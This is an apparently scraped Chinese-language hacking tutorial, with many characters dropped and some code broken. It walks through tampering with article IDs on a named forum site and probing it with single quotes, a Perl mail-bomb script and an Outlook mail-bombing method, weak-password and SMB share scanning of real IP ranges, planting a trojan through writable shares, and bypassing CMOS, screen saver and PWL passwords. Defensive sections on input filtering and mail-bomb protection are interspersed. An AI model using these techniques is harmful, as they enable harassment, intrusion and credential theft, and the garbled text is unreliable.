攻击思路方法是为后面专门介绍相关内容做铺垫
读者在学习时候应该多了解
些有关Perl和网站WebSite知识如果可能最好在自己系统中安装套网站WebSite服务
然后寻找些免费Perl代码进行调试、研究
、攻击免费论坛:这里介绍
攻击非常简单它所达到效果就是获得论坛管理员密码、具有修改论坛权限等所以并不设计漏洞扫描和清除痕迹等步骤首先介绍下问题起源:在网络上很多网站WebSite都提供了论坛或者电子留言版这些服务大多数使用asp、php、cgi或者perl编写完成而对于这些免费论坛代码黑客也能够获得因此只要经过分析就可以找到“免费软件Software中缺陷”进而对网站WebSite上提供论坛进行攻击例如http://www.tougao.com/网站WebSite提供
“稿件管理系统”就存在个很严重问题(本人已经和他们联系并介绍说明此漏洞、相关漏洞现已修复)让我们看看通过浏览器访问它形式当我们阅读其中稿件时会发现在URL内地址是/list.asp?articleid=nnnn显然list.asp是显示文章而后面?articleid=nnnn则是它参数nnnn是文章编号当黑客申请成为tougao网站WebSite员后便拥有了上传文章和修改、删除自己发表文章权利修改文章使用editarticleself.asp?articleid=nnnn其中nnnn应该是自己文章代码但是如果黑客将文章代码改变会如何样呢?修改了文章代码后发现
可以对其他文章进行修改!也就是说任何经过免费注册成为tougao网站WebSite用户都可以拥有修改任意文章权利同时使用delarticleself.asp则可以删除任何文章!次攻击过程我已经叙述完了是不是非常简单?其实像这种问题网络上随处可见好好想下如果对nnnn修改进行更“不着边际”例如输入几个英文字母或者标点符号会出现什么情况?经过尝试发现当属数值为“单引号”是系统会出现
并报告数据库文件名称、磁盘物理路径等敏感信息这样就可以直接通过下载软件Software将他们数据库下载到本地并从中找到管理员账号在早期
YukiBBS3000上当注册者注册信息内包含单引号时也会出现“运行”提示并且造成论坛内部数据彻底终止论坛正常运行2、防范攻击:
相对来说
网易、新浪等大型门户网站WebSite在这方面做比较好他们对文章ID号进行了判断防止特殊
介入如果使用者输入了非法经过检测系统会提示输入ID号码非法并且拒绝接受请求返回个“输入非法”界面另外对于文章
修改他们也考虑非常周到在进行每次文章修改时候系统都会检测用户身份确定准备修改文章是否属于登陆身份如果不属于则会提出警告信息而实际上这种问题在早期他们网站WebSite上也是存在只不过因管理员网络安全意识比较强因此即使发现并修补了漏洞cgi、perl等
在设计时候必须考虑到各种可能出现情况例如对文件名提交必须考虑周到个没有考虑到特殊名称也许会对系统造成非常严重后果用户输入个文件名,有可能就试图打开输入危险串!例如用户输入文件名中包含路径如目录斜杠和双点!尽管你期望是输入公用文件名(例如report.txt)但结果却可能是/report.txt或../../report.txt等等系统中所有文件就有可能泄露出去后果是可想而知设计cgi、perl
最好能够在代码中加入下面非常检测代码:
(($file_name=~/[^a-zA-Z_\.]/)||($file_name=~/^\./)){ #文件包含有不合法
}另外还要注意对大于号、小于号
判断
这两种符号是html文档中属性符号不进行屏蔽会对论坛造成严重后果网络上不是有很多“小儿科”聊天室踢人术吗?简单方式是不允许小于号和大于号出现所有HTML语法必须包含在这两个间如果检测到它们就返回个提示下面行Perl代码快速地清除了这两个:$user_input=~s/<>//g;
当然还有比较好
选择就是将这两个转换成它们HTML换码(特殊代码),用于表示每个而不使用该本身下面代码通过全部用<替换了小于符号用>替换了大于符号从而完成了转换过程: $user_input=~s/</& lt;/g;
$user_input=~s/>/& gt;/g;
3、编写简单
邮件炸弹:利用Perl
可以非常快速编写邮件炸弹这种思路方法比起直接使用别人编写邮件炸弹要好多至少学习者能够真正“体会下”什么才是黑客有关这个炸弹编译环境是具备台有CGI权限网络服务器同时这台服务器上提供了sendmail命令(当然这切可以在自己系统上进行设置)并且学习着还要初步了解有关perl语言知识原理非常简单就是利用sendmail命令向目标重复发送相同内容电子邮件为了控制发送邮件数量我们声明个计数器变量同时将用while
做循环下面我们看下源代码:#!/bin/perl
$file='/user/lib/sendmail';
$target='[email protected]';
$count=0;
while($count<1000){
open(MAIL,"/$file$target") || die" Can not open $file!\n
pr
MAIL"哈哈你被攻击啦"close(MAIL);
sleep 3;
$count
;}
看明白了吗?
就上面这点儿是不是非常简单?Perl属于解释型语言因而不需要进行编译直接将源代码上传到服务器上然后设置成为755或者775型就可以通过浏览器
而直接使用了中$file和$target变量分别定义了sendmail命令路径和目标地址在使用此以前要根据个人需要进行修改而$count变量是我们要发送炸弹邮件数量发送邮件工作是服务器完成因而速度非常快这个数量可以设置大些我们并不会感觉到缓慢4、使用Outlook制作电子邮件炸弹:
相对上
种思路方法这个思路方法更加直接它不需要专用工具而只需要利用Outlook电子邮件客户端软件Software就可以轻松完成首先介绍下邮件炸弹基本原理:电子邮件炸弹般来说分成两种种是通过发送巨大垃圾邮件使对方电子邮件服务器空间溢出从而造成无法接受电子邮件;另种思路方法是无休止发送相同内容但很小邮件使对方接收不过来而放弃自己电子邮箱因此我们只要实现其中种即可称的为“邮件炸弹”使用Outlook制作电子邮件炸弹就是利用了上面说
第 2种思路方法不断向指定目标发送电子邮件首先我们要做些准备工作:申请个免费电子信箱并把这个信箱账号设置到Outlook中然后选择Outlook工具菜单“工具”-〉“账号”选择其中刚刚申请那个电子邮件账号然后点击窗口右面“属性”按钮在出现属性窗口中继续点击窗口上面“高级”标签更改“发送”设置中“邮件拆分大小”属性值这个值尽量更改小些(推荐更改成16)确认退出这样以后只要使用这个经过设置
电子信箱发电子邮件只要邮件大小超过了规定字节数Outlook就会自动将电子邮件进行分割例如封1600KB信件将它拆分成16KB封电子邮件发送给对方对方信箱中就会出现100多封电子邮件邮件炸弹功能就实现了!5、如何防止电子邮件炸弹:
电子邮件
防范可以从多个方面着手例如未雨绸缪、从开始就谨慎使用电子信箱或者也可以亡羊补牢、尽快修复电子信箱在网络上大多数有关防范邮件炸弹文章都说是Linux等系统而真正涉及初级用户并不是很多然是实际更多人使用还是Windows系统即便pop3服务器是Linux系统现在也没有更多人通过传统命令方式接收邮件了这里将讲述个和读者联系紧密防止电子邮件炸弹思路方法1、不公开信箱地址、准备多个信箱:
早作准备
不让黑客知道自己电子信箱地址是最好思路方法这就需要使用者在网络上尽量少公开自己信箱地址不要轻易将地址留给不认识人或者留在电子论坛上当然如果可以使用者可以多申请几个电子信箱区别信箱联络区别人专门预备出个公开电子信箱旦受到攻击也不会造成过多损失2、使用软件Software快速清理炸弹邮件:
使用BombCleaner等炸弹清理软件Software
可以在不接受信件时候察看邮件清单从中选择垃圾信件进行远程删除这样做可以节省大量下载信件时间同时也堵住了通过电子邮件传播病毒但是这种思路方法有它最明显缺陷:旦信箱已经被邮件塞满了就来不及删除上面信件、而且信发送过来重要信件也无法接收了3、设置信箱过滤:
信箱过滤可以很好
解决上面软件Software解决不了问题过滤器可以设置在本地电子邮件客户端上也可以直接通过浏览器在pop3信箱内部进行设置前者和上面介绍利用软件Software基本类似也是在接收电子邮件时候对邮件是否属于垃圾或炸弹进行判断所以在信箱被塞满时候也不见起到什么效果但是如果能够在pop3服务器上设置自己信箱
过滤就可以从根本上避免被攻击可能了具体做法是这样通过浏览器登陆到pop3服务器上然后进入自己信箱的后找到“邮件收发设置”并且在其中过滤器内填写有关发送垃圾邮件邮件地址(多个地址可以用分号隔开)并且确认保存这样就能够在服务器上过滤掉炸弹邮件、保障自己电子信箱安全了4、设置接收邮件
大小:如果黑客发送过来
不是成百上千封“小信件”而是封上百兆炸弹如何办呢?这种邮件不需要多少封过来就可以把电子信箱塞满满所以用户在设置“过滤”时候还要注意“接收信件大小”选项最好将这个数值控制在电子信箱 3分的左右例如使用者电子信箱空间是 3十兆那么可以通过设置规定接收信件大小不得超过十兆每封如果超过了这个数值那么来信将被确认为邮件炸弹而直接被系统舍弃这样邮件炸弹便再无施展自己空间了6、弱口令和共享服务攻击:
“弱口令”和“共享”都是指系统在设置过程中忽略了网络安全
考虑而带来安全隐患例如当我们假设个FTP服务器时候软件Software在默认情况下会有很多开放登录账号如果没有删除这些账号就将系统投入使用那么任何人都可以通过这些预先设置账号进行系统登录使用xscanner可以进行“弱口令扫描”
使用者通过-ntpass参数进行操作假设我们现在对61.135.50.1-61.135.50.254进行扫描可以用xscanner 61.135.50.1-61.135.50.254 -v -ntpass完成整个C类段扫描并且从结果中找到存在弱口令系统进行远程登录下面我来介绍
个更加直接思路方法:首先要使用SMBScanner共享扫描软件Software进行扫描
运行这个软件Software并在IP地址段内输入开始和结束扫描IP地址然后单击start按钮就可以了在扫描过程中SMBScanner会随时显示找到服务器并且显示出来将其中个IP地址记录下来(例如61.135.60.24)然后运行浏览器并在URL地址输入栏内输入“\\61.135.60.24”等待会儿就会发现对方硬盘信息显示在浏览器窗口内了的后我们可以对显示出来
文件进行操作当然有系统可能在共享目录中设置了密码破解密码工作会在以后学习这是学习者可以换个IP继续尝试另外很多系统设置共享目录都没有限制“写”权限这个时候我们就可以上船个木马并修改系统autoexec.bat文件这样当系统下次启动时就会将上传木马激活入侵者就可以完全掌握对方电脑系统了这看上去是不是很过瘾?但是千万不要只局限在这里
这不过是利用软件Software完成个极为简单黑客动作还不能真正称得上是黑客!我不提倡大家使用这种思路方法也不提倡利用各种现成软件Software当黑客学习者要通过这个软件Software使用学习有关NetBIOS和SMB知识下面让我们看看这其中隐藏原理:说先介绍
下网络协议:网络协议是用于各种网络服务的间信息传递标准现在流行网络协议主要有TCP/IP协议还有用于局域网IPX协议在这些协议中NetBIOS是个基本协议它负责文件、目录、打印机等共享设备管理可以被用于Warp连接, Warp 4, LAN Server, Lan Server/400, IBM PC Lan and Warp Server (from IBM), LANtastic in SMB mode (from Artisoft), MS-Client, Windows for Workgroups, Windows 95, LAN Manager and Windows NT Workstation & Server, DEC Pathworks, LM/UX, AS/UX, Syntax and Samba客户端或服务器的间信息沟通而对于视窗系统来说这个协议叫做SMB(Server Message Block)通过这个协议可以访问共享被其他用户许可文件和文件夹也正是由于SMB
存在才使得黑客可以轻而易举进入到开放了共享目录系统中如果有天学习者突然发现自己系统“桌面”上突然多了个文件那么不要奇怪这很可能就是某个朋友进到系统的后给您留下来警告信息7、本地密码破解:
网络黑客通常都是通过各种手段破解远程服务器上
密码而对于网吧、公司的类地方任何人都可以接触到本地电脑这样本地电脑里面密码就也有可能被黑客破解例如今天流行oicq软件Software在本地就是存在个记录密码文件黑客得到了这个文件就可以对oicq进行破解了下面我们看看本地电脑中常见几种密码和想对应破解过程:1、开机密码:
开机密码
也就是CMOS密码根据用户设置区别开机密码般分为两种区别情况种就是Setup密码(采用此方式时系统可直接启动而仅仅只在进入BIOS设置时要求输入密码);另种就是
密码(采用此方式时无论是直接启动还是进行BIOS设置都要求输入密码没有密码将事无成)对于用户设置这两种密码我们破解思路方法是有所区别(1)Setup密码:
如果计算机能正常引导
只是不能进入BIOS设置(即设置了Setup密码)那么我们在遗忘密码的后只需在DOS状态下启动DEBUG然后输入如下命令即可手工清除密码:- o 70 16
- o 71 16
- q
另外
不熟悉DEBUG用户也可到http://www.
hua.com/down/Cmospwd.zip下载个专门破解CMOS密码工具软件SoftwareCmospwd然后在DOS启动该它就会将用户CMOS密码显示出来(Cmospwd支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS)使用非常方便(2)
密码:若没有密码根本不能启动计算机(即设置了
密码)那我们就无法通过软件Software来解决密码遗忘问题了此时惟思路方法就是打开机箱给CMOS放电清除CMOS中所有内容(当然也就包括密码)然后重新开机进行设置另外有些主板设置了CMOS密码清除跳线将该跳线短接也可达到同样目(详情参见主板介绍说明书)2、Windows操作系统密码:
(1)Windows启动密码:
遗忘Windows
启动密码虽然不会影响系统启动但它将导致用户无法进入自己个人设置因此破解Windows启动密码以找回“丢失”“个性”也是很有必要为此我们可删除Windows安装目录下*.PWL密码文件及Profiles子目录下所有个人信息文件然后重新启动Windows系统就会弹出个不包含任何用户名密码设置框我们无需输入任何内容直接点击“确定”按钮Windows密码即被删除另外运行“regedit.exe”打开注册表数据库“HKEY_LOCAL_MACHINE”→“Network”→“Logon”分支下“UserProfiles”修改为“0”然后重新启动Windows也可达到同样目(2)电源管理密码:
Windows
电源管理功能也可以设置密码设置此功能后系统在从节能状态返回时就会要求输入密码从而在定程度上实现保护系统目不过由于电源管理功能密码和Windows启动密码完全样因此我们只要按照前面思路方法破解了Windows启动密码其电源管理密码也就不攻自破了(3)屏幕保护密码:
Windows
屏幕保护中有个“密码设置”可以通过设置让系统在处于屏幕保护状态时无法终止这样做可以有效避免他人操作个人系统但是这屏幕保护密码也是有它安全隐患经过下面几种操作都可以轻易绕过屏幕保护密码验证机制第
种思路方法比较简单在屏幕保护出现弥马提示窗口时候直接在电脑光驱中放入张带有Aurorun光盘光盘放入的后系统会自动执行光盘内容屏幕保护被终止同时不需要输入任何密码!另外还可以使用OOB攻击
通过WinNuke的类OOB攻击工具对系统进行攻击存在问题Windows系统会出现蓝屏随便输入任意键系统就会终止屏幕保护了如果
台机器尚未运行屏保那就更简单了运行regedit看看\HKEY_CURRENT_USER\Control Panel\desktop\ScreenSave_Data里面就是加过密屏幕保护密码了如果不想练练解密就干脆删了它如果想当回hacker那就自己试试加区别密码看看能不能找出它算法Windows屏保加密算法很弱智从这里也能看出微软对Windows安全性其实并不在乎(4)拨号账户密码:
个人拨号上网
账号和密码都是保存在系统windows\*.pwl文件中从网络上下载个可以察看Windows密码Passthief软件Software然后运行软件Software并输入准备破解pwl文件很快个人上网密码就可以显示出来了从上面
介绍中可以看出Windows密码保护功能并不完善无论是开机密码还是屏幕保护、电源管理密码都非常脆弱我们必须辅的以其他控制措施才能达到防止他人入侵目8、防范上网账号、密码被盗:
在网络上使用
很多密码中上网账号密码最为重要它最初是网络服务商给网络服务商当然知道你密码般来说当你购买了网络服务商上网帐号后网络服务商都会叫你上网的后尽快更改你密码设置新密码最好是数字、字母、特殊符号结合如果你上网账号密码被别人窃取那么他就可以使用你账号上网而网络费用却都要记在你账号上因此这个密码对于上网者来说是比较重要
要保证密码安全应该考虑下几点:1、在上网
拨号中不要选择保存密码,选择了保存密码Windows就会将密码保存到电脑里它会给这个密码起个后缀为pwl文件别人接触你电脑就能很容易地看到这个文件密码也就会暴露无遗假如有黑客从网络上进入你电脑他可以用种黑客攻破系统找到你保存密码文件并获取你上网账号和密码如果你不保存密码你电脑里就不会有后缀为pwl有关密码文件黑客也就不好窃取2、在申请上网账号
时候要选择只允许次接入就是当你拨号上网时候其它机器再次使用这个账号无法拨号上网,那么当你拨号上网时发现无法拨入时候定是其他人在盗用你账号让你无法拨号上网3、在申请上网账号
时候定要指定电话号码拨入可以设定几个你常用电话号码(家里或单位)只有你指定电话号码才可以使用这个账号拨号上网即使别人拿到了你密码也无法使用4、设置区别
密码网络上要求你设置密码地方很多你在设置这些密码时可不要图省事设成相同这样你密码很快就会变成“明码”黑客旦获取了你个密码的后他就会用这个密码尝试着解开其它设置密码地方比如你E-mail密码那么你电子邮件秘密也就会暴露在网上了更有甚者有人得到了你密码就会以你名义胡作非为损坏你形象给你惹来麻烦5、不要向任何人透露你
密码有人甚至会在网络上冒充网络服务商给你发来邮件说是系统要更新需要提供你密码以便更新系统这是地地道道谎言更新系统和你密码无关而且任何个网络服务商也不会向你索取密码6、经常上你所在
网络服务商主页进行账号查询检查你连接上网时间是否和你平时上网时间致如果有重复或你没有使用账号却有连接记录时证明你账号被盗用了定要立刻修改密码篇文章: 黑客窃取密码原理及防范篇文章: 实战phpbb论坛非法权限提升漏洞
最新评论